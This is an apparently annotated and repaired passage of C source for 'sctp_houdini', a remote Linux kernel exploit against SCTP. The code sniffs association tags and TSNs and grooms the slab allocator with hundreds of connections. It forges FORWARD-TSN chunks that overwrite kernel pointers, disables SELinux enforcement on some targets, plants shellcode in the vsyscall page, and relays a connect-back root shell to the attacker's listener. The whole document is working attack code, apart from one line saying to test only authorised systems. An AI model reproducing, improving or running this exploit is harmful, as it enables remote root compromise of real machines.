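    fwd->type = SCTP_FWD;
    fwd->flags = 0;
    fwd->len = htons((__u16)chunk_len);
    fwd->new_tsn = htonl(tsn + 1);

    /* stream pairs start right after new_tsn */
    pstream = (__u16 *)(hdr->chunks + sizeof(*fwd));
    for (i = 0; i < streamlen; i++)
    {
        *pstream++ = streams[i][0];
        *pstream++ = streams[i][1];
    }

    *p_len = (int)(sizeof(*hdr) + chunk_len);
    hdr->checksum = htonl(sctp_crc32c(buff, (__u32)(*p_len)));
    return hdr;
}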
  597.  
  598.  
  599.  
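/* this function gets VTAG/TSN bound with this socket pair */
/*
 * Sniff the target's SCTP replies on a raw socket and recover, for the two
 * associations of interest, the peer's verification tag (first 4 bytes of
 * the INIT ACK chunk payload) and the cumulative TSN it acknowledges (first
 * 4 bytes of each SACK chunk payload).  A forged FWD-TSN chunk needs both.
 *
 * sp, sp2: our source ports of the two associations; dp: the target port.
 * tsn/vtag and tsn2/vtag2: outputs for (sp,dp) and (sp2,dp); a value that
 * stays 0 was never seen.  Only the first chunk of each packet is examined.
 *
 * Stops as soon as all four values are known or after 10 s without any
 * traffic on the raw socket, and always returns 0.  Needs CAP_NET_RAW.
 * Runs in the CLONE_VM child started by main(), which writes straight into
 * the caller's globals; main() reads them only after wait().
 */
int raw_socket_engine(__u16 sp, __u16 sp2, __u16 dp,
                      __u32 *tsn, __u32 *vtag, __u32 *tsn2, __u32 *vtag2)
{
    unsigned char packet[1500];
    int raw_fd = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP);

    if (raw_fd < 0)
        __fatal_perror("socket: RAW/SCTP");

    for (;;)
    {
        fd_set r;
        struct timeval tv;
        ssize_t p_len;
        const struct iphdr *ip;
        const struct sctp_hdr *hdr;
        const struct sctp_chk *chk;
        size_t iphl, need;
        __u32 tmp;
        __u16 psp, pdp;

        FD_ZERO(&r);
        FD_SET(raw_fd, &r);
        tv.tv_sec = 10;
        tv.tv_usec = 0;
        if (select(raw_fd + 1, &r, NULL, NULL, &tv) <= 0)
            break;

        p_len = read(raw_fd, packet, sizeof(packet));
        if (p_len <= 0)
            continue;

        /* A raw IPv4 socket delivers the IP header too.  Honour IHL instead
         * of assuming 20 bytes, and make sure the SCTP common header, the
         * chunk header and the 4-byte value we read are all inside what was
         * received — the original only checked 4 bytes past the header. */
        if ((size_t)p_len < sizeof(struct iphdr))
            continue;
        ip = (const struct iphdr *)packet;
        iphl = (size_t)ip->ihl * 4;
        need = iphl + sizeof(struct sctp_hdr) + sizeof(struct sctp_chk) + sizeof(tmp);
        if (iphl < sizeof(struct iphdr) || (size_t)p_len < need)
            continue;

        hdr = (const struct sctp_hdr *)(packet + iphl);
        chk = (const struct sctp_chk *)(hdr->chunks);
        memcpy(&tmp, chk->data, sizeof(tmp));   /* unaligned-safe */
        tmp = ntohl(tmp);
        psp = ntohs(hdr->sport);
        pdp = ntohs(hdr->dport);

        /* only replies from the target port to one of our two ports matter */
        if (psp != dp)
            continue;

        if (chk->type == SCTP_SACK)
        {
            if (pdp == sp)
                *tsn = tmp;
            if (pdp == sp2)
                *tsn2 = tmp;
        }
        else if (chk->type == SCTP_INIT_ACK)
        {
            if (pdp == sp)
                *vtag = tmp;
            if (pdp == sp2)
                *vtag2 = tmp;
        }

        if (*vtag && *tsn && *vtag2 && *tsn2)
            break;
    }

    close(raw_fd);
    return 0;
}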
  667.  
/* global vars */

/* Source ports of the two attack associations: the writes that overwrite
 * the neighbouring object's pointer go through sport, the writes that then
 * land in the redirected page through sport2.  Set by sctp_getopt() from -s
 * (sport2 = sport + 1); swapped by swap_to_SLAB_chunk() on SLAB targets. */
static __u16 sport=0;
static __u16 sport2=0;
/* Peer verification tags and cumulative TSNs of those associations, filled
 * in by raw_socket_engine() running in the CLONE_VM child.  0 = not seen.
 * main() reads them only after wait() has reaped that child. */
static __u32 vtag=0, vtag2=0;
static __u32 tsn=0, tsn2=0;

/* Destination used by send_fwd_chunk(), and the raw IPPROTO_SCTP socket the
 * forged chunks are sent from (opened in main(); needs CAP_NET_RAW). */
static struct sockaddr_in server_sctp;
int raw_sctp=-1;

/* Stack for the sniffer child.  clone() is handed clone_stack + STACK_SIZE - 8
 * and the stack grows down from there, so only the first STACK_SIZE bytes are
 * ever used.  The array carries no explicit alignment — NOTE(review): the
 * ABI expects a 16-byte aligned stack pointer at function entry; confirm. */
#define STACK_SIZE 0x1000
char clone_stack[STACK_SIZE*2];
  679.  
  680.  
/* Forge a FORWARD TSN chunk for the (sp -> dp) association carrying the
 * given stream pairs (network byte order), and push it out of the global raw
 * socket raw_sctp towards server_sctp.  vtag/tsn are the association's peer
 * tag and last cumulative TSN.  Exits on send failure. */
static void send_fwd_chunk(__u16 sp, __u16 dp, __u16 streams[][2],
                           int streamlen, __u32 vtag, __u32 tsn)
{
    int wire_len = 0;
    const struct sockaddr *dst = (const struct sockaddr *)&server_sctp;
    void *pkt = make_fwd_packet(sp, dp, vtag, tsn, streams, streamlen, &wire_len);

    if (sendto(raw_sctp, pkt, wire_len, 0, dst, sizeof(server_sctp)) < 0)
        __fatal_perror("sendto: sending FWD chunk");

    free(pkt);
}
  692.  
  693.  
  694.  
/* Entry point of the CLONE_VM child started from main(): run the sniffer
 * over the two attack associations, writing into the shared globals
 * tsn/vtag/tsn2/vtag2, then exit (main() collects it with wait()).
 * The argument is unused. */
static int clone_thread(void *p)
{
    (void)p;
    (void)raw_socket_engine(sport, sport2, h.rport, &tsn, &vtag, &tsn2, &vtag2);
    return 0;
}
  700.  
  701.  
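/*
 * Open one SCTP association to h.rhost:dp, optionally bound to local port sp
 * (sp == 0: let the kernel pick), and return its descriptor.
 *
 * The number of outbound streams requested in the INIT is what sizes the
 * stream array the target allocates per association: 50 on SLAB targets
 * (a 256-byte object), 10 on SLUB targets (96 bytes).  The target is assumed
 * to offer 10 streams itself; if the application behaves differently the
 * counts must be re-probed or the corruption hits the wrong object.
 *
 * With data != 0 one byte is sent so the target's SACKs expose the
 * association's TSN to raw_socket_engine().
 *
 * The descriptor is never closed by the callers: each open association is a
 * live object on the target, and main() keeps nconn+1 of them to shape the
 * allocator.  Every failure is fatal — including the SCTP_INITMSG calls the
 * original ignored, since a wrong stream count silently corrupts the wrong
 * kernel memory.
 */
static int make_sctp_connection(__u16 sp, __u16 dp, int data)
{
    struct sctp_initmsg msg;
    socklen_t len_sctp = sizeof(msg);
    struct sockaddr_in s, c;
    int o = 1, fd;

    fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
    if (fd < 0)
        __fatal_perror("socket: sctp SOCK_STREAM");

    if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &o, sizeof(o)) < 0)
        __fatal_perror("setsockopt: SO_REUSEADDR");

    /* NOTE: here we assume server peer allocates 10 output streams (as default)
     * if the application behaves differently you must probe and change channels size
     * to get the correct slab */
    memset(&msg, 0, sizeof(msg));
    if (getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp) < 0)
        __fatal_perror("getsockopt: SCTP_INITMSG");
    /* 50 streams -> 256-byte slab object; 10 streams -> 96-byte slub object */
    msg.sinit_num_ostreams = (k->allocator_type == SLAB_ALLOCATOR) ? 50 : 10;
    msg.sinit_max_instreams = 10;
    if (setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp) < 0)
        __fatal_perror("setsockopt: SCTP_INITMSG");

    if (sp)
    {
        memset(&c, 0, sizeof(c));
        c.sin_family = AF_INET;
        c.sin_port = htons(sp);
        c.sin_addr.s_addr = INADDR_ANY;
        if (bind(fd, (struct sockaddr *)&c, sizeof(c)) < 0)
            __fatal_perror("bind: sctp socket");
    }

    memset(&s, 0, sizeof(s));
    s.sin_family = AF_INET;
    s.sin_port = htons(dp);
    s.sin_addr.s_addr = inet_addr(h.rhost);
    if (s.sin_addr.s_addr == INADDR_NONE)
        __fatal("connect: rhost is not a valid IPv4 address\n");

    if (connect(fd, (struct sockaddr *)&s, sizeof(s)) < 0)
        __fatal_perror("connect: sctp socket");

    /* send one byte of data to get correctly
     * TSN from raw socket (from SACK replies)
     */
    if (data)
    {
        if (send(fd, "", 1, 0) < 0)
            __fatal_perror("send: sctp socket data");
    }

    return fd;
}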
  768.  
  769.  
/* Convert the first len {stream id, ssn} pairs of s to network byte order
 * in place.  Call exactly once on build_stream()'s output before handing it
 * to send_fwd_chunk(); applying it twice swaps the bytes back. */
static void htons_streams(__u16 s[][2], int len)
{
    while (len-- > 0)
    {
        __u16 *pair = s[len];
        pair[0] = htons(pair[0]);
        pair[1] = htons(pair[1]);
    }
}
  779.  
  780.  
/* Print the command-line synopsis to stderr.  All six of -H -P -h -p -t -s
 * are required (sctp_getopt() exits otherwise); -c defaults to 600.  The
 * warnings about the source port are not cosmetic: re-running against the
 * same port corrupts the target's vsyscall page a second time. */
static void usage()
{
    static const char synopsis[] =
        "./sctp_houdini \n\t"
        "-H lhost (local host address for connect back shel)\n\t"
        "-P lport (local port address for connect back shell)\n\t"
        "-h rhost (remote target host)\n\t"
        "-p rport (remote target port)\n\t"
        "-t kernel (target kernel)\n\t"
        "-s sport (source port defining sctp association where corruption occurs)\n\t"
        " (always use higher port if you run the exploit multiple times eg. 20000, 21000, etc..)\n\t"
        " (NEVER reuse the same or next port or vsys will be trashed and init will die soon...)\n\t"
        "-c conn (number of connectionis before corruption - default 600)\n";

    fputs(synopsis, stderr);
}
  795.  
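/* Parse a decimal option value into a 16-bit quantity.  Junk, trailing
 * characters or a value outside 0..65535 print the usage and exit (atoi()
 * used to accept anything and silently truncate). */
static __u16 parse_u16_opt(const char *what, const char *text)
{
    char *end = NULL;
    long v;

    errno = 0;
    v = strtol(text, &end, 10);
    if (errno != 0 || end == text || *end != '\0' || v < 0 || v > 0xFFFF)
    {
        fprintf(stderr, "Invalid value for %s: '%s'\n", what, text);
        usage();
        exit(1);
    }
    return (__u16)v;
}

/*
 * Fill the global hinfo h from argv and select the target kinfo k.
 *
 * Also sets the globals sport (= -s) and sport2 (= sport + 1).  Exits with
 * status 1 after printing the usage when a required option is missing,
 * when an option is not a valid number, when sport <= nconn (main() opens
 * associations on ports sport-nconn+1 .. sport+1, which must all be
 * positive), when sport is 65535 (sport + 1 would wrap to 0), or when the
 * target name is unknown (the available names are listed).
 */
static void sctp_getopt(int argc, char *argv[])
{
    int opt;
    size_t i;

    while ((opt = getopt(argc, argv, "H:P:p:h:t:c:s:")) != -1)
    {
        switch (opt)
        {
        case 'P':
            h.lport = parse_u16_opt("-P lport", optarg);
            break;

        case 'p':
            h.rport = parse_u16_opt("-p rport", optarg);
            break;

        case 't':
            h.target = optarg;
            break;

        case 'h':
            h.rhost = optarg;
            break;

        case 'H':
            h.lhost = optarg;
            /* this break was missing: -H fell through into -c and set
             * nconn = atoi(lhost) (e.g. 192 for "192.168.1.5") */
            break;

        case 'c':
            h.nconn = parse_u16_opt("-c conn", optarg);
            break;

        case 's':
            h.sport = parse_u16_opt("-s sport", optarg);
            break;

        default:
            usage();
            exit(1);
        }
    }

    if (!h.lport || !h.rport || !h.rhost || !h.target || !h.lhost || !h.sport)
    {
        usage();
        exit(1);
    }

    if (h.sport < h.nconn + 1)
    {
        fprintf(stderr, "Source Association Port is too low: %d\n", h.sport);
        usage();
        exit(1);
    }

    if (h.sport == 0xFFFF)
    {
        fprintf(stderr, "Source Association Port is too high (sport+1 must fit 16 bits): %d\n", h.sport);
        usage();
        exit(1);
    }

    sport = h.sport;
    sport2 = (__u16)(h.sport + 1);

    for (i = 0; i < sizeof(kernels) / sizeof(kinfo); i++)
    {
        if (!strcmp(h.target, kernels[i].name))
        {
            k = &kernels[i];
            break;
        }
    }

    if (k == NULL)
    {
        fprintf(stderr, "Unable to find target: %s\nAvailable targets are:\n", h.target);
        for (i = 0; i < sizeof(kernels) / sizeof(kinfo); i++)
            fprintf(stderr, "- %s %s\n", kernels[i].name, kernels[i].info);
        exit(1);
    }
}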
  869.  
/* Put a plain gettimeofday() stub (k->vsyspatchjump) back at offset 0 of the
 * hijacked page, through the sport2 association, so root processes calling
 * gettimeofday() stop forking connect-back shells.  multiplex() calls this
 * as soon as the first shell has connected.  Exits on failure. */
void patchjump()
{
    const __u16 page_offset_words = 0;
    int npairs;

    __msg("[**] Restoring vsys: Emulate gettimeofday()... \n");

    npairs = build_stream(k->vsyspatchjump, k->vsyspatchjumpsize, page_offset_words);
    if (npairs < 0)
        __fatal("Error Building Streams...");

    htons_streams(streams, npairs);
    send_fwd_chunk(sport2, h.rport, streams, npairs, vtag2, tsn2);
}
  883.  
  884.  
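/* Write all n bytes of buf to fd, retrying on short writes.
 * Returns 0 on success, -1 with errno set on error. */
static int write_all(int fd, const char *buf, size_t n)
{
    size_t done = 0;

    while (done < n)
    {
        ssize_t w = write(fd, buf + done, n - done);
        if (w < 0)
            return -1;
        done += (size_t)w;
    }
    return 0;
}

/*
 * Wait for the connect-back shell on listenfd, restore the hijacked page,
 * then relay stdin to the shell and the shell's output to stdout until the
 * remote side closes.
 *
 * The listener is polled every 3 s with a progress dot: the payload only
 * runs once some root process on the target calls gettimeofday().  After
 * accept(), patchjump() is called before anything else so no further
 * callers fork shells; the listening socket is then closed (one shell only).
 *
 * EOF on stdin used to be mishandled: read() returned 0, select() kept
 * reporting stdin readable and the loop spun at 100% CPU.  Now stdin is
 * dropped from the poll set and the write side of the connection is shut
 * down, which lets a piped command list end the remote shell normally.
 * Short or failed writes are detected instead of ignored.
 */
static void multiplex(int listenfd)
{
    int new_fd, stdin_open = 1;
    fd_set r;
    struct timeval t;
    char buffer[1500];

    __msg("[**] Waiting daemons executing gettimeofday().. this can take up to one minute...\n");
    __msg("[**] ..");
    fflush(stdout);

    for (;;)
    {
        FD_ZERO(&r);
        FD_SET(listenfd, &r);
        t.tv_sec = 3;
        t.tv_usec = 0;
        if (select(listenfd + 1, &r, NULL, NULL, &t) != 0)
            break;
        printf("..");
        fflush(stdout);
    }
    __msg("..\n");

    new_fd = accept(listenfd, NULL, 0);
    if (new_fd < 0)
        __fatal_perror("accept: listen fd");

    __msg("[**] Connected!\n");
    patchjump();

    close(listenfd);

    if (write_all(new_fd, "id\n", 3) < 0)
        __fatal_perror("write: to net");

    for (;;)
    {
        ssize_t ret;

        FD_ZERO(&r);
        FD_SET(new_fd, &r);
        if (stdin_open)
            FD_SET(0, &r);
        if (select(new_fd + 1, &r, NULL, NULL, NULL) <= 0)
            break;

        if (stdin_open && FD_ISSET(0, &r)) // read from stdin
        {
            ret = read(0, buffer, sizeof(buffer));
            if (ret < 0)
                __fatal_perror("read: from stdin");
            else if (ret == 0)
            {
                /* local EOF: stop polling stdin, tell the shell no more input is coming */
                stdin_open = 0;
                shutdown(new_fd, SHUT_WR);
            }
            else if (write_all(new_fd, buffer, (size_t)ret) < 0)
                __fatal_perror("write: to net");
        }

        if (FD_ISSET(new_fd, &r))
        {
            ret = read(new_fd, buffer, sizeof(buffer));
            if (ret == 0)
            {
                __msg("Endopoint closed the connection\n");
                break;
            }
            else if (ret > 0)
            {
                if (write_all(1, buffer, (size_t)ret) < 0)
                    __fatal_perror("write: to stdout");
            }
            else
                __fatal_perror("read: from net");
        }
    }
}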
  959.  
  960.  
/* needed when exploiting old SLAB
 *
 * Exchange the roles of the two attack associations: (sport, vtag, tsn)
 * becomes what (sport2, vtag2, tsn2) was and vice versa.  main() calls this
 * once, after the sniffer has finished, on SLAB_ALLOCATOR targets only —
 * evidently the two objects sit the other way round there than on SLUB. */
void swap_to_SLAB_chunk()
{
#define SWAP_VALUES(a, b) do { __typeof__(a) _tmp = (a); (a) = (b); (b) = _tmp; } while (0)
    SWAP_VALUES(tsn, tsn2);
    SWAP_VALUES(vtag, vtag2);
    SWAP_VALUES(sport, sport2);
#undef SWAP_VALUES
}
  979.  
  980.  
  981.  
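/* Forge and send one FWD-TSN chunk that writes `size` bytes of `data` at
 * 16-bit-word offset `first_word` of the target association's stream array
 * (see build_stream), using association (sp -> h.rport) with the given peer
 * tag and TSN.  Exits on failure.  Collects the build/htons/send sequence
 * that main() repeats for every write. */
static void forge_write(const void *data, __u32 size, __u16 first_word,
                        __u16 sp, __u32 assoc_vtag, __u32 assoc_tsn)
{
    int npairs = build_stream(data, size, first_word);

    if (npairs < 0)
        __fatal("Error Building Streams...");

    htons_streams(streams, npairs);
    send_fwd_chunk(sp, h.rport, streams, npairs, assoc_vtag, assoc_tsn);
}

/*
 * Exploit driver.  In order:
 *  1. parse options and select the target (sctp_getopt);
 *  2. open the TCP listener the payload connects back to and patch that
 *     address/port into the shellcode in place;
 *  3. open the raw SCTP socket used to inject forged chunks and start a
 *     CLONE_VM child (clone_thread) that sniffs the target's INIT ACK / SACK
 *     replies for the vtag/TSN of the two attack associations;
 *  4. open nconn+1 SCTP associations on consecutive source ports to shape the
 *     target's allocator so the two attack associations end up adjacent
 *     ("flushing slub cache"); only those two carry data, so only their TSNs
 *     are exposed; the descriptors are deliberately left open;
 *  5. drop our own outbound SCTP ABORTs (disable_abort) and wait() for the
 *     sniffer child — that wait() is what makes its writes to the globals
 *     vtag/tsn/vtag2/tsn2 safe to read here;
 *  6. send forged FORWARD-TSN chunks: through sport, overwrite the
 *     neighbouring object's pointer with the target's vsys-shadow address;
 *     through sport2, write the shellcode at page offset 0x930 and the jump
 *     to it at offset 0 (on Fedora the same trick first zeroes the SELinux
 *     flag);
 *  7. wait for a root process on the target to call gettimeofday() and
 *     connect back, restore the page, relay the shell (multiplex).
 *
 * Needs root locally (raw sockets, iptables) and leaves an iptables rule
 * behind (see disable_abort).  Per usage(), reusing a source port corrupts
 * the target's vsyscall page a second time and can kill init.  Only ever run
 * against systems you are authorised to test.
 */
int main(int argc, char **argv)
{
    int ret, i, listenfd, o = 1;
    struct sockaddr_in l;
    __u32 lh, acc;
    __u16 lp;

    sctp_getopt(argc, argv);

    /* connect-back listener; must be up before the payload can run */
    listenfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (listenfd < 0)
        __fatal_perror("socket: listen sock");

    if (setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, &o, sizeof(o)) < 0)
        __fatal_perror("setsockopt: SO_REUSEADDR");

    memset(&l, 0, sizeof(l));
    l.sin_family = AF_INET;
    l.sin_port = htons(h.lport);
    l.sin_addr.s_addr = inet_addr(h.lhost);
    if (l.sin_addr.s_addr == INADDR_NONE)
        __fatal("bind: lhost is not a valid IPv4 address\n");
    if (bind(listenfd, (struct sockaddr *)&l, sizeof(l)) < 0)
        __fatal_perror("bind: sock");

    if (listen(listenfd, 4) < 0)
        __fatal_perror("listen: sock");

    /* set connect back params: patch port and host into the shellcode in place */
    lh = l.sin_addr.s_addr;
    lp = htons(h.lport);
    if (k->portoff + 2 > k->scodesize || k->hostoff + 4 > k->scodesize)
        __fatal("target entry: port/host offsets outside the shellcode\n");
    memcpy(k->scode + k->portoff, &lp, 2);
    memcpy(k->scode + k->hostoff, &lh, 4);

    raw_sctp = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP);
    if (raw_sctp < 0)
        __fatal_perror("socket: RAW/SCTP montitor socket");

    server_sctp.sin_family = AF_INET;
    server_sctp.sin_port = htons(h.rport);
    server_sctp.sin_addr.s_addr = inet_addr(h.rhost);
    if (server_sctp.sin_addr.s_addr == INADDR_NONE)
        __fatal("rhost is not a valid IPv4 address\n");

    __msg("[**] Monitoring Network for TSN/VTAG pairs.. \n");
    ret = clone(clone_thread, clone_stack + STACK_SIZE - 8, CLONE_VM | SIGCHLD, NULL);
    if (ret < 0)
        __fatal_perror("clone");

    sleep(1);

    __msg("[**] Start flushing slub cache...\n");
    for (i = 0; i <= h.nconn; i++)
    {
        /* ports sport-nconn+1 .. sport+1; the two attack associations send a
         * byte so their TSN shows up in SACKs.  Descriptors stay open on
         * purpose: each one is a live object on the target. */
        __u16 p = (__u16)(sport - (h.nconn - 1) + i);
        (void)make_sctp_connection(p, h.rport, (p == sport || p == sport2));
        // usleep(10);
    }

    disable_abort();
    /* wait for monitoring engine */
    wait(NULL);

    if (k->allocator_type == SLAB_ALLOCATOR)
        swap_to_SLAB_chunk();

    if (!(vtag && tsn && vtag2 && tsn2))
        __fatal("VTAG/TSN not found: network error");

    __msg_f("[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n", tsn, vtag, tsn2, vtag2);
    sleep(1);

    /* 16-bit-word offset of the neighbouring object's pointer */
    acc = (k->slubsize - k->chunksize) / 2;

    if (k->selinux)
    {
        __msg("[**] Overwriting neightboard sctp map..\n");
        forge_write(k->selinux, k->ptrsize, acc, sport, vtag, tsn);

        __msg("[**] Disabling Selinux Enforcing Mode..\n");
        forge_write(__zero, 4, 0, sport2, vtag2, tsn2);
    }

    __msg("[**] Overwriting neightboard sctp map ......\n");
    forge_write(k->vsysaddr, k->ptrsize, acc, sport, vtag, tsn);

    /* shellcode at page offset 0x930 (word 1176); the jump stub at offset 0
     * must agree with this, see generic_x86_64_jump */
    __msg("[**] Overwriting vsyscall shadow map..\n");
    forge_write(k->scode, k->scodesize, 0x930 / 2, sport2, vtag2, tsn2);

    __msg("[**] Hijacking vsyscall shadow map..\n");
    forge_write(k->vsysjump, k->vsysjumpsize, 0, sport2, vtag2, tsn2);

    sleep(1);

    multiplex(listenfd);
    __msg("[**] Closing Connection... \n");
    return 0;
}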